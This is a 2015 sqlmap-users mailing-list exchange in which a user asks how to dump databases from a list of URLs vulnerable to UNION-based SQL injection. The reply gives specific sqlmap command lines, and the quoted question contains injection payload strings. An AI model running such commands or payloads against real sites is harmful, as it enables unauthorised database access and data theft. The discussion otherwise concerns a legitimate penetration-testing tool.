Re: [sqlmap-users] Dump database by injected url, without finding column
From: Miroslav S. <mir...@gm...> - 2015-10-07 09:06:02
sqlmap has to find a SQLi. It can't just dump data without knowing anything about the SQLi. Every SQLi technique has different rules for data dumping.

I would suggest that you run (if you want to be stricter with your given cases):

python sqlmap.py -u "http://hello.com/index.php?id=1" --technique=BU --prefix="" --suffix="-- -" --union-cols=5
python sqlmap.py -u "http://world.com/index.php?page=3" --technique=BU --prefix="" --suffix="-- -" --union-cols=5

Bye

On Wed, Oct 7, 2015 at 11:47 AM, bogdan <bog...@ou...> wrote:

> Hello!
>
> I have a list of vulnerable UnionBased URLs (example):
>
> http://hello.com/index.php?id=-1+and+union+all+select+1,2,3,[point],4,5--
> http://world.com/index.php?page=3+and+union+all+select+1,2,3,4,[point]--
>
> How can I load one URL of this list into sqlmap and dump the structure
> of the database, without finding the injection point?
>
> Sorry for my bad English, and thanks!

--
Miroslav Stampar
http://about.me/stamparm